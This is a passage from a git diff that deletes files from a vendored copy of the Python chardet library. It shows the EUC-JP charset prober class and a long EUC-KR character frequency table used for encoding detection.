Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from constants import eStart, eError, eItsMe -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCJPDistributionAnalysis -from jpcntx import EUCJPContextAnalysis -from mbcssm import EUCJPSMModel - -class EUCJPProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCJPSMModel) - self._mDistributionAnalyzer = EUCJPDistributionAnalysis() - self._mContextAnalyzer = EUCJPContextAnalysis() - self.reset() - - def reset(self): - MultiByteCharSetProber.reset(self) - self._mContextAnalyzer.reset() - - def get_charset_name(self): - return "EUC-JP" - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar, charLen) - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen) - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - contxtCf = self._mContextAnalyzer.get_confidence() - distribCf = self._mDistributionAnalyzer.get_confidence() - return max(contxtCf, distribCf) diff --git a/chardet/chardet/eucjpprober.pyc b/chardet/chardet/eucjpprober.pyc deleted file mode 100644 index 019edc8..0000000 Binary files a/chardet/chardet/eucjpprober.pyc and /dev/null differ diff --git a/chardet/chardet/euckrfreq.py b/chardet/chardet/euckrfreq.py deleted file mode 100644 index 1463fa1..0000000 --- a/chardet/chardet/euckrfreq.py +++ /dev/null @@ -1,594 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -# Sampling from about 20M text materials include literature and computer technology - -# 128 --> 0.79 -# 256 --> 0.92 -# 512 --> 0.986 -# 1024 --> 0.99944 -# 2048 --> 0.99999 -# -# Idea Distribution Ratio = 0.98653 / (1-0.98653) = 73.24 -# Random Distribution Ration = 512 / (2350-512) = 0.279. -# -# Typical Distribution Ratio - -EUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0 - -EUCKR_TABLE_SIZE = 2352 - -# Char to FreqOrder table , -EUCKRCharToFreqOrder = ( \ - 13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722, 87, -1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398, -1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488, 20,1733,1269,1734, - 945,1400,1735, 47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739, - 116, 987, 813,1401, 683, 75,1204, 145,1740,1741,1742,1743, 16, 847, 667, 622, - 708,1744,1745,1746, 966, 787, 304, 129,1747, 60, 820, 123, 676,1748,1749,1750, -1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856, - 344,1763,1764,1765,1766, 89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205, - 709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779, -1780, 337, 751,1058, 28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782, 19, -1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567, -1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797, -1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802, -1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899, - 885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818, -1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409, -1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697, -1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770, -1412,1837,1838, 39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723, - 544,1023,1081, 869, 91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416, -1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300, - 119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083, - 893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857, -1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871, - 282, 96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420, -1421, 268,1877,1422,1878,1879,1880, 308,1881, 2, 537,1882,1883,1215,1884,1885, - 127, 791,1886,1273,1423,1887, 34, 336, 404, 643,1888, 571, 654, 894, 840,1889, - 0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893, -1894,1123, 48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317, -1899, 694,1900, 909, 734,1424, 572, 866,1425, 691, 85, 524,1010, 543, 394, 841, -1901,1902,1903,1026,1904,1905,1906,1907,1908,1909, 30, 451, 651, 988, 310,1910, -1911,1426, 810,1216, 93,1912,1913,1277,1217,1914, 858, 759, 45, 58, 181, 610, - 269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375, -1919, 359,1920, 687,1921, 822,1922, 293,1923,1924, 40, 662, 118, 692, 29, 939, - 887, 640, 482, 174,1925, 69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870, - 217, 854,1163, 823,1927,1928,1929,1930, 834,1931, 78,1932, 859,1933,1063,1934, -1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888, -1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950, -1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065, -1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002, -1283,1222,1960,1961,1962,1963, 36, 383, 228, 753, 247, 454,1964, 876, 678,1965, -1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467, - 50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285, - 639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971, 7, - 103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979, -1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985, - 818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994, -1995, 560, 223,1287, 98, 8, 189, 650, 978,1288,1996,1437,1997, 17, 345, 250, - 423, 277, 234, 512, 226, 97, 289, 42, 167,1998, 201,1999,2000, 843, 836, 824, - 532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003, -2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008, 71,1440, 745, - 619, 688,2009, 829,2010,2011, 147,2012, 33, 948,2013,2014, 74, 224,2015, 61, - 191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023, -2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591, 52, 724, 246,2031,2032, -2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912, -2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224, - 719,1170, 959, 440, 437, 534, 84, 388, 480,1131, 159, 220, 198, 679,2044,1012, - 819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050, -2051,2052,2053, 59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681, - 499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414, -1444,2064,2065, 41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068, -2069,1292,2070,2071,1445,2072,1446,2073,2074, 55, 588, 66,1447, 271,1092,2075, -1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850, -2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606, -2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449, -1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452, - 949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112, -2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121, -2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130, - 22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174, 73,1096, 231, 274, - 962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139, -2141,2142,2143,2144, 11, 374, 844,2145, 154,1232, 46,1461,2146, 838, 830, 721, -1233, 106,2147, 90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298, -2150,1462, 761, 565,2151, 686,2152, 649,2153, 72, 173,2154, 460, 415,2155,1463, -2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747, -2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177, 23, 530, 285, -2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187, -2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193, 10, -2194, 613, 424,2195, 979, 108, 449, 589, 27, 172, 81,1031, 80, 774, 281, 350, -1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201, -2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972, -2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219, -2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233, -2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242, -2243, 521, 486, 548,2244,2245,2246,1473,1300, 53, 549, 137, 875, 76, 158,2247, -1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178, -1475,2249, 82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255, -2256, 18, 450, 206,2257, 290, 292,1142,2258, 511, 162, 99, 346, 164, 735,2259, -1476,1477, 4, 554, 343, 798,1099,2260,1100,2261, 43, 171,1303, 139, 215,2262, -2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702, -1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272, 67,2273, - 295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541, -2282,2283,2284,2285,2286, 70, 852,1071,2287,2288,2289,2290, 21, 56, 509, 117, - 432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187, -2294,1046,1479,2295, 340,2296, 63,1047, 230,2297,2298,1305, 763,1306, 101, 800, - 808, 494,2299,2300,2301, 903,2302, 37,1072, 14, 5,2303, 79, 675,2304, 312, -2305,2306,2307,2308,2309,1480, 6,1307,2310,2311,2312, 1, 470, 35, 24, 229, -2313, 695, 210, 86, 778, 15, 784, 592, 779, 32, 77, 855, 964,2314, 259,2315, - 501, 380,2316,2317, 83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484, -2320,2321,2322,2323,2324,2325,1485,2326,2327, 128, 57, 68, 261,1048, 211, 170, -1240, 31,2328, 51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335, - 425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601, -1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395, -2351,1490,1491, 62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354, -1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476, -2361,2362, 332, 12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035, - 416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498, -2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310, -1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389, -2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504, -1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505, -2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145, -1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624, - 593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700, -2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221, -2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377, - 644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448, - 915, 489,2449,1514,1184,2450,2451, 515, 64, 427, 495,2452, 583,2453, 483, 485, -1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705, -1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465, - 291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471, -2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997, -2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486, - 797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187, 65,2494, - 434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771, - 585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323, -2499,2500, 49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491, - 95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510, - 161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519, -2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532, -2533, 25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199, - 704, 504, 468, 758, 657,1528, 196, 44, 839,1246, 272, 750,2543, 765, 862,2544, -2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247, -1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441, - 249,1075,2556,2557,2558, 466, 743,2559,2560,2561, 92, 514, 426, 420, 526,2562, -2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362, -2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583, -2584,1532, 54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465, - 3, 458, 9, 38,2588, 107, 110, 890, 209, 26, 737, 498,2589,1534,2590, 431, - 202, 88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151, - 974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596, -2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601, 94, 175, 197, 406, -2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611, -2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619, -1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628, -2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042, - 670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642, # 512, 256 -#Everything below is of no interest for detection purpose -2643,2644,2645,2646,2647,2648,2649,2650,2651,2652,2653,2654,2655,2656,2657,2658, -2659,2660,2661,2662,2663,2664,2665,2666,2667,2668,2669,2670,2671,2672,2673,2674, -2675,2676,2677,2678,2679,2680,2681,2682,2683,2684,2685,2686,2687,2688,2689,2690, -2691,2692,2693,2694,2695,2696,2697,2698,2699,1542, 880,2700,2701,2702,2703,2704, -2705,2706,2707,2708,2709,2710,2711,2712,2713,2714,2715,2716,2717,2718,2719,2720, -2721,2722,2723,2724,2725,1543,2726,2727,2728,2729,2730,2731,2732,1544,2733,2734, -2735,2736,2737,2738,2739,2740,2741,2742,2743,2744,2745,2746,2747,2748,2749,2750, -2751,2752,2753,2754,1545,2755,2756,2757,2758,2759,2760,2761,2762,2763,2764,2765, -2766,1546,2767,1547,2768,2769,2770,2771,2772,2773,2774,2775,2776,2777,2778,2779, -2780,2781,2782,2783,2784,2785,2786,1548,2787,2788,2789,1109,2790,2791,2792,2793, -2794,2795,2796,2797,2798,2799,2800,2801,2802,2803,2804,2805,2806,2807,2808,2809, -2810,2811,2812,1329,2813,2814,2815,2816,2817,2818,2819,2820,2821,2822,2823,2824, -2825,2826,2827,2828,2829,2830,2831,2832,2833,2834,2835,2836,2837,2838,2839,2840, -2841,2842,2843,2844,2845,2846,2847,2848,2849,2850,2851,2852,2853,2854,2855,2856, -1549,2857,2858,2859,2860,1550,2861,2862,1551,2863,2864,2865,2866,2867,2868,2869, -2870,2871,2872,2873,2874,1110,1330,2875,2876,2877,2878,2879,2880,2881,2882,2883, -2884,2885,2886,2887,2888,2889,2890,2891,2892,2893,2894,2895,2896,2897,2898,2899, -2900,2901,2902,2903,2904,2905,2906,2907,2908,2909,2910,2911,2912,2913,2914,2915, -2916,2917,2918,2919,2920,2921,2922,2923,2924,2925,2926,2927,2928,2929,2930,1331, -2931,2932,2933,2934,2935,2936,2937,2938,2939,2940,2941,2942,2943,1552,2944,2945, -2946,2947,2948,2949,2950,2951,2952,2953,2954,2955,2956,2957,2958,2959,2960,2961, -2962,2963,2964,1252,2965,2966,2967,2968,2969,2970,2971,2972,2973,2974,2975,2976, -2977,2978,2979,2980,2981,2982,2983,2984,2985,2986,2987,2988,2989,2990,2991,2992, -2993,2994,2995,2996,2997,2998,2999,3000,3001,3002,3003,3004,3005,3006,3007,3008, -3009,3010,3011,3012,1553,3013,3014,3015,3016,3017,1554,3018,1332,3019,3020,3021, -3022,3023,3024,3025,3026,3027,3028,3029,3030,3031,3032,3033,3034,3035,3036,3037, -3038,3039,3040,3041,3042,3043,3044,3045,3046,3047,3048,3049,3050,1555,3051,3052, -3053,1556,1557,3054,3055,3056,3057,3058,3059,3060,3061,3062,3063,3064,3065,3066, -3067,1558,3068,3069,3070,3071,3072,3073,3074,3075,3076,1559,3077,3078,3079,3080, -3081,3082,3083,1253,3084,3085,3086,3087,3088,3089,3090,3091,3092,3093,3094,3095, -3096,3097,3098,3099,3100,3101,3102,3103,3104,3105,3106,3107,3108,1152,3109,3110, -3111,3112,3113,1560,3114,3115,3116,3117,1111,3118,3119,3120,3121,3122,3123,3124, -3125,3126,3127,3128,3129,3130,3131,3132,3133,3134,3135,3136,3137,3138,3139,3140, -3141,3142,3143,3144,3145,3146,3147,3148,3149,3150,3151,3152,3153,3154,3155,3156, -3157,3158,3159,3160,3161,3162,3163,3164,3165,3166,3167,3168,3169,3170,3171,3172, -3173,3174,3175,3176,1333,3177,3178,3179,3180,3181,3182,3183,3184,3185,3186,3187, -3188,3189,1561,3190,3191,1334,3192,3193,3194,3195,3196,3197,3198,3199,3200,3201, -3202,3203,3204,3205,3206,3207,3208,3209,3210,3211,3212,3213,3214,3215,3216,3217, -3218,3219,3220,3221,3222,3223,3224,3225,3226,3227,3228,3229,3230,3231,3232,3233, -3234,1562,3235,3236,3237,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248, -3249,3250,3251,3252,3253,3254,3255,3256,3257,3258,3259,3260,3261,3262,3263,3264, -3265,3266,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,1563,3278,3279, -3280,3281,3282,3283,3284,3285,3286,3287,3288,3289,3290,3291,3292,3293,3294,3295, -3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311, -3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327, -3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343, -3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359, -3360,3361,3362,3363,3364,1335,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374, -3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,1336,3388,3389, -3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405, -3406,3407,3408,3409,3410,3411,3412,3413,3414,1337,3415,3416,3417,3418,3419,1338, -3420,3421,3422,1564,1565,3423,3424,3425,3426,3427,3428,3429,3430,3431,1254,3432, -3433,3434,1339,3435,3436,3437,3438,3439,1566,3440,3441,3442,3443,3444,3445,3446, -3447,3448,3449,3450,3451,3452,3453,3454,1255,3455,3456,3457,3458,3459,1567,1191, -3460,1568,1569,3461,3462,3463,1570,3464,3465,3466,3467,3468,1571,3469,3470,3471, -3472,3473,1572,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486, -1340,3487,3488,3489,3490,3491,3492,1021,3493,3494,3495,3496,3497,3498,1573,3499, -1341,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510,3511,1342,3512,3513, -3514,3515,3516,1574,1343,3517,3518,3519,1575,3520,1576,3521,3522,3523,3524,3525, -3526,3527,3528,3529,3530,3531,3532,3533,3534,3535,3536,3537,3538,3539,3540,3541, -3542,3543,3544,3545,3546,3547,3548,3549,3550,3551,3552,3553,3554,3555,3556,3557, -3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3568,3569,3570,3571,3572,3573, -3574,3575,3576,3577,3578,3579,3580,1577,3581,3582,1578,3583,3584,3585,3586,3587, -3588,3589,3590,3591,3592,3593,3594,3595,3596,3597,3598,3599,3600,3601,3602,3603, -3604,1579,3605,3606,3607,3608,3609,3610,3611,3612,3613,3614,3615,3616,3617,3618, -3619,3620,3621,3622,3623,3624,3625,3626,3627,3628,3629,1580,3630,3631,1581,3632, -3633,3634,3635,3636,3637,3638,3639,3640,3641,3642,3643,3644,3645,3646,3647,3648, -3649,3650,3651,3652,3653,3654,3655,3656,1582,3657,3658,3659,3660,3661,3662,3663, -3664,3665,3666,3667,3668,3669,3670,3671,3672,3673,3674,3675,3676,3677,3678,3679, -3680,3681,3682,3683,3684,3685,3686,3687,3688,3689,3690,3691,3692,3693,3694,3695, -3696,3697,3698,3699,3700,1192,3701,3702,3703,3704,1256,3705,3706,3707,3708,1583, -1257,3709,3710,3711,3712,3713,3714,3715,3716,1584,3717,3718,3719,3720,3721,3722, -3723,3724,3725,3726,3727,3728,3729,3730,3731,3732,3733,3734,3735,3736,3737,3738, -3739,3740,3741,3742,3743,3744,3745,1344,3746,3747,3748,3749,3750,3751,3752,3753, -3754,3755,3756,1585,3757,3758,3759,3760,3761,3762,3763,3764,3765,3766,1586,3767, -3768,3769,3770,3771,3772,3773,3774,3775,3776,3777,3778,1345,3779,3780,3781,3782, -3783,3784,3785,3786,3787,3788,3789,3790,3791,3792,3793,3794,3795,1346,1587,3796, -3797,1588,3798,3799,3800,3801,3802,3803,3804,3805,3806,1347,3807,3808,3809,3810, -3811,1589,3812,3813,3814,3815,3816,3817,3818,3819,3820,3821,1590,3822,3823,1591, -1348,3824,3825,3826,3827,3828,3829,3830,1592,3831,3832,1593,3833,3834,3835,3836, -3837,3838,3839,3840,3841,3842,3843,3844,1349,3845,3846,3847,3848,3849,3850,3851, -3852,3853,3854,3855,3856,3857,3858,1594,3859,3860,3861,3862,3863,3864,3865,3866, -3867,3868,3869,1595,3870,3871,3872,3873,1596,3874,3875,3876,3877,3878,3879,3880, -3881,3882,3883,3884,3885,3886,1597,3887,3888,3889,3890,3891,3892,3893,3894,3895, -1598,3896,3897,3898,1599,1600,3899,1350,3900,1351,3901,3902,1352,3903,3904,3905, -3906,3907,3908,3909,3910,3911,3912,3913,3914,3915,3916,3917,3918,3919,3920,3921, -3922,3923,3924,1258,3925,3926,3927,3928,3929,3930,3931,1193,3932,1601,3933,3934, -3935,3936,3937,3938,3939,3940,3941,3942,3943,1602,3944,3945,3946,3947,3948,1603, -3949,3950,3951,3952,3953,3954,3955,3956,3957,3958,3959,3960,3961,3962,3963,3964, -3965,1604,3966,3967,3968,3969,3970,3971,3972,3973,3974,3975,3976,3977,1353,3978, -3979,3980,3981,3982,3983,3984,3985,3986,3987,3988,3989,3990,3991,1354,3992,3993, -3994,3995,3996,3997,3998,3999,4000,4001,4002,4003,4004,4005,4006,4007,4008,4009, -4010,4011,4012,4013,4014,4015,4016,4017,4018,4019,4020,4021,4022,4023,1355,4024, -4025,4026,4027,4028,4029,4030,4031,4032,4033,4034,4035,4036,4037,4038,4039,4040, -1605,4041,4042,4043,4044,4045,4046,4047,4048,4049,4050,4051,4052,4053,4054,4055, -4056,4057,4058,4059,4060,1606,4061,4062,4063,4064,1607,4065,4066,4067,4068,4069, -4070,4071,4072,4073,4074,4075,4076,1194,4077,4078,1608,4079,4080,4081,4082,4083, -4084,4085,4086,4087,1609,4088,4089,4090,4091,4092,4093,4094,4095,4096,4097,4098, -4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,1259,4109,4110,4111,4112,4113, -4114,4115,4116,4117,4118,4119,4120,4121,4122,4123,4124,1195,4125,4126,4127,1610, -4128,4129,4130,4131,4132,4133,4134,4135,4136,4137,1356,4138,4139,4140,4141,4142, -4143,4144,1611,4145,4146,4147,4148,4149,4150,4151,4152,4153,4154,4155,4156,4157, -4158,4159,4160,4161,4162,4163,4164,4165,4166,4167,4168,4169,4170,4171,4172,4173, -4174,4175,4176,4177,4178,4179,4180,4181,4182,4183,4184,4185,4186,4187,4188,4189, -4190,4191,4192,4193,4194,4195,4196,4197,4198,4199,4200,4201,4202,4203,4204,4205, -4206,4207,4208,4209,4210,4211,4212,4213,4214,4215,4216,4217,4218,4219,1612,4220, -4221,4222,4223,4224,4225,4226,4227,1357,4228,1613,4229,4230,4231,4232,4233,4234, -4235,4236,4237,4238,4239,4240,4241,4242,4243,1614,4244,4245,4246,4247,4248,4249, -4250,4251,4252,4253,4254,4255,4256,4257,4258,4259,4260,4261,4262,4263,4264,4265, -4266,4267,4268,4269,4270,1196,1358,4271,4272,4273,4274,4275,4276,4277,4278,4279, -4280,4281,4282,4283,4284,4285,4286,4287,1615,4288,4289,4290,4291,4292,4293,4294, -4295,4296,4297,4298,4299,4300,4301,4302,4303,4304,4305,4306,4307,4308,4309,4310, -4311,4312,4313,4314,4315,4316,4317,4318,4319,4320,4321,4322,4323,4324,4325,4326, -4327,4328,4329,4330,4331,4332,4333,4334,1616,4335,4336,4337,4338,4339,4340,4341, -4342,4343,4344,4345,4346,4347,4348,4349,4350,4351,4352,4353,4354,4355,4356,4357, -4358,4359,4360,1617,4361,4362,4363,4364,4365,1618,4366,4367,4368,4369,4370,4371, -4372,4373,4374,4375,4376,4377,4378,4379,4380,4381,4382,4383,4384,4385,4386,4387, -4388,4389,4390,4391,4392,4393,4394,4395,4396,4397,4398,4399,4400,4401,4402,4403, -4404,4405,4406,4407,4408,4409,4410,4411,4412,4413,4414,4415,4416,1619,4417,4418, -4419,4420,4421,4422,4423,4424,4425,1112,4426,4427,4428,4429,4430,1620,4431,4432, -4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,1260,1261,4443,4444,4445,4446, 